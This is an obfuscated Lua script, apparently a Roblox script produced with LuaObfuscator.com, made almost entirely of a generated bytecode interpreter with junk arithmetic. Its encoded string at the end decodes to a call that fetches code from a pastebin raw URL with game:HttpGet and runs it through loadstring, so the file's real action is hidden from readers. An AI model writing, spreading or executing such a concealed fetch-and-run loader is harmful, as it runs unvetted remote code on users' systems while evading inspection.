--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v106=0;local v107;while true do if (v106==1) then return v107;end if (v106==0) then v107=v5(v83,v19);v19=nil;v106=1;end end else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/(((21 -16) -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(1 + 0))) + (878 -(282 + 595)))) ;return v84-(v84%(2 -1)) ;else local v85=619 -(555 + 64) ;local v86;while true do if (v85==(0 + 0)) then v86=(933 -(857 + (191 -(32 + 85))))^(v32-1) ;return (((v31%(v86 + v86))>=v86) and ((1045 + 21) -(68 + 997))) or (1270 -(226 + 1044)) ;end end end end local function v21() local v34=0 + 0 ;local v35;while true do if (v34==((1307 -(87 + 263)) -(892 + 65))) then v35=v1(v16,v18,v18);v18=v18 + (2 -(181 -(67 + 113))) ;v34=1 -0 ;end if (v34==(1 -0)) then return v35;end end end local function v22() local v36=0 -0 ;local v37;local v38;while true do if (v36==(1 + 0)) then return (v38 * (628 -372)) + v37 ;end if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + (7 -5) );v18=v18 + 2 ;v36=953 -(802 + 150) ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) );v18=v18 + (3 -0) + 1 ;return (v42 * (16778213 -(915 + 82))) + (v41 * (185570 -120034)) + (v40 * (150 + 106)) + v39 ;end local function v24() local v43=1187 -(1069 + 118) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(2 -(1424 -(630 + 793)))) then v46=1 -(0 + 0) ;v47=(v20(v45,1,2 + 2 + 16 ) * ((3 -1)^(32 + 0))) + v44 ;v43=(2686 -1893) -(368 + 423) ;end if (v43==((28 -22) -4)) then v48=v20(v45,39 -(10 + 8) ,(47 + 72) -88 );v49=((v20(v45,474 -(416 + 26) )==(3 -2)) and  -(1 + 0)) or 1 ;v43=4 -1 ;end if (v43==0) then v44=v23();v45=v23();v43=439 -(145 + 293) ;end if (v43==(433 -(44 + 386))) then if (v48==(1486 -(998 + 488))) then if (v47==(0 + 0)) then return v49 * (0 + 0) ;else local v108=772 -(201 + 571) ;while true do if (v108==(1138 -(116 + 1022))) then v48=(13 -9) -3 ;v46=(885 -(261 + 624)) + 0 ;break;end end end elseif (v48==((13278 -5806) -(7172 -(760 + 987)))) then return ((v47==((1080 -(1020 + 60)) -(1913 -(1789 + 124)))) and (v49 * (1/0))) or (v49 * NaN) ;end return v8(v49,v48-(1882 -(814 + 45)) ) * (v46 + (v47/((4 -2)^52))) ;end end end local function v25(v50) local v51;if  not v50 then v50=v23();if (v50==(766 -(745 + 21))) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;local v52={};for v66=1, #v51 do v52[v66]=v2(v1(v3(v51,v66,v66)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 341 -(218 + 123) ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if ((1765 -(454 + 1309))~=v53) then else for v93= #"<",v23() do local v94=(function() return v21();end)();if (v20(v94, #"|", #" ")==(1581 -(1535 + 46))) then local v101=(function() return 0;end)();local v102=(function() return;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if (v101==1) then local v132=(function() return 0 + 0 ;end)();while true do if ((0 + 0)~=v132) then else v104=(function() return {v22(),v22(),nil,nil};end)();if (v102==(0 -0)) then local v177=(function() return 0;end)();local v178=(function() return;end)();while true do if (v177==0) then v178=(function() return 560 -(306 + 254) ;end)();while true do if (v178==(0 + 0)) then v104[ #"91("]=(function() return v22();end)();v104[ #"0836"]=(function() return v22();end)();break;end end break;end end elseif (v102== #"{") then v104[ #"xxx"]=(function() return v23();end)();elseif (v102==(2 -0)) then v104[ #"nil"]=(function() return v23() -((3 -1)^16) ;end)();elseif (v102~= #"-19") then else local v185=(function() return 0 -0 ;end)();local v186=(function() return;end)();while true do if (v185==(0 + 0)) then v186=(function() return 0 -0 ;end)();while true do if (v186==(285 -(134 + 151))) then v104[ #"xnx"]=(function() return v23() -((1667 -(970 + 695))^(306 -(60 + 230))) ;end)();v104[ #".dev"]=(function() return v22();end)();break;end end break;end end end v132=(function() return 1 -0 ;end)();end if (v132==(1991 -(582 + 1408))) then v101=(function() return 6 -4 ;end)();break;end end end if (v101==(1 + 1)) then if (v20(v103, #" ", #":")== #"[") then v104[1458 -(282 + 1174) ]=(function() return v59[v104[2 -0 ]];end)();end if (v20(v103,813 -(569 + 242) ,7 -5 )~= #"~") then else v104[ #"19("]=(function() return v59[v104[ #"asd"]];end)();end v101=(function() return 1827 -(1195 + 629) ;end)();end if (v101==(3 -0)) then if (v20(v103, #"asd", #"19(")== #"/") then v104[ #"0313"]=(function() return v59[v104[ #"0313"]];end)();end v54[v93]=(function() return v104;end)();break;end if (v101~=(241 -(187 + 54))) then else v102=(function() return v20(v94,782 -(162 + 618) , #"gha");end)();v103=(function() return v20(v94, #"http",5 + 1 );end)();v101=(function() return 1 + 0 ;end)();end end end end for v95= #":",v23() do v55[v95-#" " ]=(function() return v28();end)();end return v57;end if ( #">"==v53) then local v90=(function() return 1024 -(706 + 318) ;end)();while true do if (v90~=(1253 -(721 + 530))) then else v53=(function() return 3 -1 ;end)();break;end if ((1271 -(945 + 326))==v90) then v58=(function() return v23();end)();v59=(function() return {};end)();v90=(function() return 1 -0 ;end)();end if (1==v90) then for v109= #"[",v58 do local v110=(function() return 0 + 0 ;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if (v110~=(2 -1)) then else v113=(function() return nil;end)();while true do if ( #"["~=v111) then else if (v112== #"{") then v113=(function() return v21()~=0 ;end)();elseif (v112==(1638 -(1373 + 263))) then v113=(function() return v24();end)();elseif (v112== #"nil") then v113=(function() return v25();end)();end v59[v109]=(function() return v113;end)();break;end if (v111==0) then local v175=(function() return 0;end)();local v176=(function() return;end)();while true do if (v175==0) then v176=(function() return 700 -(271 + 429) ;end)();while true do if (v176==(0 + 0)) then v112=(function() return v21();end)();v113=(function() return nil;end)();v176=(function() return 1;end)();end if (v176~=(1001 -(451 + 549))) then else v111=(function() return  #"}";end)();break;end end break;end end end end break;end if (v110==(1086 -(461 + 625))) then local v134=(function() return 0;end)();while true do if (v134==1) then v110=(function() return 1;end)();break;end if (v134==0) then v111=(function() return 0 + 0 ;end)();v112=(function() return nil;end)();v134=(function() return 1;end)();end end end end end v57[ #"xnx"]=(function() return v21();end)();v90=(function() return 2;end)();end end end if (v53~=(0 + 0)) then else local v91=(function() return 0;end)();local v92=(function() return;end)();while true do if (v91~=(1171 -(418 + 753))) then else v92=(function() return 0 -0 ;end)();while true do if (v92==(1 + 1)) then v53=(function() return  #"[";end)();break;end if (v92~=(1 -0)) then else v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v92=(function() return 1 + 1 ;end)();end if (v92~=(0 + 0)) then else v54=(function() return {};end)();v55=(function() return {};end)();v92=(function() return 1 -0 ;end)();end end break;end end end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[1771 -(1749 + 20) ];local v65=v60[3];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -(1 + 0);local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=1322 -((2829 -(1183 + 397)) + 73) ,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + (2 -1) + 0 ];else v78[v87]=v75[v87 + (1146 -((1795 -(797 + 532)) + 679)) ];end end local v79=(v76-v70) + ((2 + 0) -1) ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=(8 -5)) then if ((3926<=4134) and (v81<=(1901 -(106 + 1794)))) then if ((4157>1889) and (v81>(0 + 0))) then v78[v80[2 + 0 ]]=v62[v80[3 + 0 ]];else v78[v80[2]]();end elseif (v81==(1 + 0 + (2 -1))) then local v116=0 -0 ;local v117;local v118;local v119;local v120;local v121;while true do if ((v116==6) or (164>=2785)) then v78[v121]=v78[v121](v13(v78,v121 + (2 -1) ,v73));v72=v72 + (115 -(4 + 110)) ;v80=v68[v72];v78[v80[586 -(57 + (1729 -(373 + 829))) ]]();v72=v72 + ((3403 -(1913 + 62)) -(41 + 1386)) ;v116=(841 -(476 + 255)) -(17 + (1216 -(369 + 761))) ;end if (v116==(3 + 0)) then v78[v121 + (1 -0) ]=v120;v78[v121]=v120[v80[11 -7 ]];v72=v72 + (167 -(122 + 44)) ;v80=v68[v72];v78[v80[2 + 0 ]]=v80[5 -2 ];v116=12 -(20 -12) ;end if (v116==(4 + 0)) then v72=v72 + 1 ;v80=v68[v72];v121=v80[1 + 1 ];v118,v119=v71(v78[v121](v13(v78,v121 + (1 -0) ,v80[3])));v73=(v119 + v121) -(66 -(30 + 35)) ;v116=5;end if ((v116==(1 + 0)) or (525==2109)) then v72=v72 + (1258 -(1043 + 214)) ;v80=v68[v72];v78[v80[7 -5 ]]=v62[v80[3]];v72=v72 + (1213 -(323 + 515 + 374)) ;v80=v68[v72];v116=5 -(5 -2) ;end if (v116==(585 -(361 + 219))) then v117=320 -(53 + 267) ;for v169=v121,v73 do v117=v117 + 1 + 0 ;v78[v169]=v118[v117];end v72=v72 + (414 -(15 + 398)) ;v80=v68[v72];v121=v80[2];v116=10 -4 ;end if ((v116==(984 -(18 + 964))) or (1912>2982)) then v78[v80[7 -(243 -(64 + 174)) ]]=v62[v80[2 + 1 ]];v72=v72 + 1 ;v80=v68[v72];v121=v80[2 + (1933 -(565 + 1368)) ];v120=v78[v80[853 -(20 + 830) ]];v116=1 + 2 + 0 ;end if (v116==(133 -(116 + (14 -4)))) then v80=v68[v72];do return;end break;end if (v116==0) then v117=nil;v118,v119=nil;v120=nil;v121=nil;v78[v80[(3 -2) + 1 ]]={};v116=739 -(542 + 196) ;end end else local v122=v80[3 -1 ];v78[v122]=v78[v122](v13(v78,v122 + 1 + (1661 -(1477 + 184)) ,v73));end elseif (v81<=(3 + 2)) then if ((33==33) and (v81>(2 + 2))) then do return;end else local v124=0 -0 ;local v125;local v126;while true do if ((647<=3287) and (v124==(0 -0))) then v125=v80[(1889 -(144 + 192)) -(1126 + 425) ];v126=v78[v80[(555 -147) -(118 + (503 -(42 + 174))) ]];v124=3 -2 ;end if (v124==(1122 -(118 + 1003))) then v78[v125 + ((858 -(564 + 292)) -1) ]=v126;v78[v125]=v126[v80[(287 + 94) -(142 + 235) ]];break;end end end elseif ((3054<=4015) and ((v81<=(27 -21)) or (2318>=4800))) then local v127=0 + 0 + 0 ;local v128;local v129;local v130;local v131;while true do if (v127==(978 -(553 + 424))) then v73=(v130 + v128) -(1 -0) ;v131=0;v127=2 + (0 -0) ;end if ((0 + 0)==v127) then v128=v80[2 + 0 + 0 ];v129,v130=v71(v78[v128](v13(v78,v128 + 1 + (1504 -(363 + 1141)) ,v80[(306 -(244 + 60)) + 1 + 0 ])));v127=2 -1 ;end if (v127==(5 -3)) then for v172=v128,v73 do local v173=(476 -(41 + 435)) -0 ;while true do if (v173==0) then v131=v131 + 1 + 0 ;v78[v172]=v129[v131];break;end end end break;end end elseif ((1871<3382) and ((v81>(33 -26)) or (142>=4749))) then v78[v80[2]]=v80[3];else v78[v80[755 -(239 + 514) ]]={};end v72=v72 + (1002 -(938 + 63)) + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F77345471754C743300094Q00027Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
